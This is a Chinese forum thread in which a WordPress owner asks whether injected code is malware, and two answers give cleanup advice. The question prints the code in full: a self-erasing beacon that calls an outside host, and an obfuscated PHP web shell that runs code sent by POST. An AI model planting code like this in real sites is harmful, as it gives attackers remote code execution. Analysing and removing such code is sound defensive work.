这是wordpress病毒吗？

Question

我刚刚注意到我的一些 wordpress 项目在特定位置包含一些随机代码。

例如： wp-includes/meta.php 包含在文件底部的代码如下：

check_meta();
function check_meta(){
    $jp = __FILE__;
    $jptime = filemtime($jp);

    if(time() >= 1456732115){
        $jp_c = file_get_contents($jp);
        if($t = @strpos($jp_c,"check_meta();")) {
            $contentp = substr($jp_c,0,$t);
            if(@file_put_contents($jp, $contentp)){
                @touch($jp,$jptime);
            }
        }
    }
    @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php");
}

另一个位置：wp-includes/ID3/getid.php包含以下代码：

<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['ttr6i']) && ($www= $_POST['ttr6i']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>

基本上，我看到的是 check_meta() 方法正在更新 wp-includes/meta.php 文件而不更改其修改时间。然后，file_get_contents正在连接一些中文服务器，并通过$_GET传递一些数据。

在第二个文件中，str_rot13('riny') 等于 eval

以前有人处理过这种问题吗？也许有人可以对这段代码说更多。期待您的回音。目前我把它当作病毒来对待，因为它已经传播到我的许多项目中。

Answer 1

永远不要相信你没有包含的不熟悉的代码！诈骗者经常试图让恶意软件看起来无害，就像上面一样。尝试安装 WordFence、Sucuri 或其他安全插件并运行扫描。

Answer 2

看来您的服务器已被黑客入侵，过去我不得不处理一两次类似的问题。是的，黑客似乎专门针对 WordPress 网站。

无论如何都不应修改 WordPress 核心。

1. 更改所有服务器密码（客户中心、FTP、SSH、SQL 等）

2. 下载全新安装的 WordPress 核心并删除旧的

3. 检查您的 wp-content 文件夹是否存在安全问题，尤其是您的主题和插件（检查任何修改或不安全的代码）

4. 在 wp-config.php 中更改您的安全盐

5. 重新设置 WordPress 站点后，可提高其安全性。有很多关于如何保护 WordPress 的文章，并且有几个 WordPress 安全插件可用。扫描您的网站。

6. 如果再次出现类似问题，您还应该检查您的网络服务器/网络主机的安全设置。